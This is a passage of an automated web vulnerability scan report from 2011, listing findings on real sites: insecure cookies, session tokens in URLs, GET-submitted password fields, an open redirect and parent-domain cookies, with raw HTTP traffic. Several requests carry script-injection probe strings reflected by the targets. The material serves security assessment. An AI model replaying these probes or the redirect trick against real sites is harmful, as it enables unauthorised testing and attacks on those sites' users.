Set-Cookie: ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.25. https://customer.kronos.com/user/forgotpassword.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.26. https://customer.kronos.com/user/forgotusername.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

11.27. https://customer.kronos.com/user/logindenied.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://customer.kronos.com
Path:	/user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

Visitor=173%2E193%2E214%2E243; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

12. Session token in URL previous next
There are 5 instances of this issue:

http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard
http://mbox5.offermatica.com/m2/netsuite/mbox/standard
http://mbox9e.offermatica.com/m2/eset/mbox/standard
http://shopping.netsuite.com/app/site/query/additemtocart.nl
http://shopping.netsuite.com/s.nl

12.1. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://kronos.tt.omtrdc.net
Path:	/m2/kronos/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();

12.2. http://mbox5.offermatica.com/m2/netsuite/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox5.offermatica.com
Path:	/m2/netsuite/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox5.offermatica.com/m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742461357-40763&mboxCount=1&mbox=overall_conversion_tracking-mbox&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1303736347554-914602&mboxPC=1303736347554-914602.17&mboxPage=1303742461357-40763&mboxCount=1&mbox=overall_conversion_tracking-mbox&mboxId=0&mboxURL=http%3A//www.netsuite.com/portal/page_not_found.shtml&mboxReferrer=http%3A//www.netsuite.com/pages/portal/page_not_found.jspinternal%3DT&mboxVersion=28 HTTP/1.1
Host: mbox5.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1278
Date: Mon, 25 Apr 2011 14:40:50 GMT
Server: Test & Target

var mboxCurrent=mboxFactoryDefault.get('overall_conversion_tracking-mbox',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-o
...[SNIP]...

12.3. http://mbox9e.offermatica.com/m2/eset/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox9e.offermatica.com
Path:	/m2/eset/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox9e.offermatica.com/m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37

Request

GET /m2/eset/mbox/standard?mboxHost=www.eset.com&mboxSession=1303736347554-914602&mboxPage=1303736347554-914602&mboxCount=1&mbox=mbx_store_con&mboxId=0&mboxTime=1303718347701&mboxURL=http%3A%2F%2Fwww.eset.com%2Fus%2Fstore&mboxReferrer=http%3A%2F%2Fwww.eset.com%2Fus%2Fbusiness%2Fproducts&mboxVersion=37 HTTP/1.1
Host: mbox9e.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 168
Date: Mon, 25 Apr 2011 12:58:56 GMT
Server: Test & Target

mboxFactories.get('default').get('mbx_store_con',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303736347554-914602.17");

12.4. http://shopping.netsuite.com/app/site/query/additemtocart.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650

Request

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 62

buyid=1650&Submit.x=43&Submit.y=8&c=438708&qtyadd=1&promocode=

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 12:59:54 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=
Expires: 0
NS_RTIMER_COMPOSITE: 1120473518:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
Set-Cookie: NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

12.5. http://shopping.netsuite.com/s.nl previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The URL in the request appears to contain a session token within the query string:

http://shopping.netsuite.com/s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 25 Apr 2011 12:59:55 GMT
Server: Apache
Location: /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8
NS_RTIMER_COMPOSITE: 1229161202:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

13. Password field submitted using GET method previous next
There are 5 instances of this issue:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js
https://hourly.deploy.com/hmc/report/
https://hourly.deploy.com/hmc/report/index.cfm
http://my.webalta.ru/public/engine/templates.js
http://my.webalta.ru/public/engine/templates.js

13.1. http://direct.yandex.ru/pages/direct/_direct-1303387947.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://direct.yandex.ru
Path:	/pages/direct/_direct-1303387947.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://direct.yandex.ru/pages/direct/_direct-1303387947.js

The form contains the following password field:

passwd

Request

Response

13.2. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://hourly.deploy.com/hmc/report/index.cfm?'

The form contains the following password field:

j_password

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

13.3. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

https://hourly.deploy.com/hmc/report/index.cfm?'

The form contains the following password field:

j_password

Request

GET /hmc/report/index.cfm?'"--></style></script><script>netsparker(0x00004F)</script> HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:01 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:01 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

13.4. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password field:

pass

Request

Response

13.5. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://my.webalta.ru/public/engine/templates.js

The form contains the following password fields:

pass
pass2

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:27:32 GMT
Content-Type: application/x-javascript
Content-Length: 17139
Last-Modified: Tue, 27 Apr 2010 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:27:32 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

//
//
   // .................. ............
   function tmpl_favicon(url)
   {
       url = url.replace('http://', '') + '/';
       url = url.substr(0, url.indexOf('/'));
       var sub1 = url.substr(0, 2);
       var
...[SNIP]...
<td style=\'width:50%;\'><form onsubmit="f_reg(this); return false;" >';
       str+='...................... ................... ...... ......................, ...... ........ ................ .......... .................. .. ................ .......................';
       s
...[SNIP]...
<br><input size=20 name="pass" type="password" value="" onClick=\'this.focus();\'>';
       str+='<br>
...[SNIP]...
<br><input size=20 name="pass2" type="password" value="" onClick=\'this.focus();\'>';
       str+= '<br>
...[SNIP]...

14. Open redirection previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://an.yandex.ru
Path:	/count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a7d7bab4fd77ae98a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

http://www.iveco-ptc.spb.ru?.a7d7bab4fd77ae98a/=1&_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Request

GET /count/Ijtkb0MgGE440000ZhGnMDi4XP4H3fK2cm5kGoi1CuYjHd42YQMmoXgO1vsOQXQSkwfZHm6MfVcfmfgb3ijKagP3JWEAexCl0QMTAIkHj6-WPWoFiJVw7GAViYYJd0QJL9bNYw9wcWH2Z90r3A2GQXYdZoEZ0QG2V0q0?test-tag=17073164&.a7d7bab4fd77ae98a/=1 HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:35:17 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:35:17 GMT
Expires: Mon, 25 Apr 2011 14:35:17 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://www.iveco-ptc.spb.ru?.a7d7bab4fd77ae98a/=1&_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
Content-Length: 0

15. Cookie scoped to parent domain previous next
There are 97 instances of this issue:

http://www.gartner.com/technology/contact/contact_gartner.jsp
http://www.trucklist.ru/cars/trucks
http://ad.afy11.net/ad
http://ad.amgdgt.com/ads/
http://ad.trafficmp.com/a/bpix
http://ad.trafficmp.com/a/bpix
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.voicefive.com/b
http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204
http://core1.node15.top.mail.ru/counter
http://core2.node12.top.mail.ru/counter
http://d7.zedo.com/img/bh.gif
http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter
http://goods.adnectar.com/analytics/get_avia_js
http://ib.adnxs.com/ab
http://ib.adnxs.com/pxj
http://idcs.interclick.com/Segment.aspx
http://m.adnxs.com/msftcookiehandler
http://map.media6degrees.com/orbserv/aopix
http://mc.yandex.ru/watch/57617
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/tap.php
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil
http://pl.yumenetworks.com/static_beacon_47953_0_22860_16844_6237426397_0_0_0_133BeuXuCot.gif
http://pogoda.webalta.ru/
http://r2.mail.ru/b12179277.gif
http://r2.mail.ru/b12179279.gif
http://r2.mail.ru/b12179280.gif
http://r2.mail.ru/b12201458.png
http://r2.mail.ru/b12526055.gif
http://r2.mail.ru/b12526056.jpg
http://r2.mail.ru/b12526057.jpg
http://r2.mail.ru/b12526058.jpg
http://r2.mail.ru/b12526059.jpg
http://r2.mail.ru/b12526060.jpg
http://r2.mail.ru/b12526061.jpg
http://r2.mail.ru/b12526062.jpg
http://r2.mail.ru/b12526063.jpg
http://r2.mail.ru/b12526064.jpg
http://r2.mail.ru/b12526065.gif
http://r2.mail.ru/b12526191.gif
http://r2.mail.ru/b12526192.gif
http://r2.mail.ru/b12526193.gif
http://r2.mail.ru/b12526194.gif
http://r2.mail.ru/b12526208.gif
http://r2.mail.ru/b12526210.gif
http://r2.mail.ru/b12527647.gif
http://r2.mail.ru/b12529050.jpg
http://r2.mail.ru/b12530142.jpg
http://r2.mail.ru/b12530159.jpg
http://r2.mail.ru/b12531249.jpg
http://r2.mail.ru/b12531545.jpg
http://r2.mail.ru/b12531624.jpg
http://r2.mail.ru/b12532203.jpg
http://r2.mail.ru/b12752186.jpg
http://r2.mail.ru/b12752583.jpg
http://r2.mail.ru/b12752584.jpg
http://r2.mail.ru/b12752585.jpg
http://r2.mail.ru/b12752586.jpg
http://r2.mail.ru/b12855502.png
http://r2.mail.ru/b12887675.jpg
http://r2.mail.ru/b12887676.jpg
http://r2.mail.ru/b12887677.jpg
http://r2.mail.ru/b12961140.jpg
http://r2.mail.ru/b12961154.jpg
http://r2.mail.ru/b12961373.jpg
http://r2.mail.ru/b12962356.jpg
http://r2.mail.ru/b12963308.jpg
http://r2.mail.ru/b12965362.jpg
http://r2.mail.ru/b12968616.jpg
http://r2.mail.ru/b12979027.jpg
http://r2.mail.ru/b13039712.jpg
http://r2.mail.ru/b13044176.jpg
http://r2.mail.ru/b13049054.jpg
http://r2.mail.ru/b13050852.jpg
http://r2.mail.ru/b13057590.swf
http://r2.mail.ru/b13058787.jpg
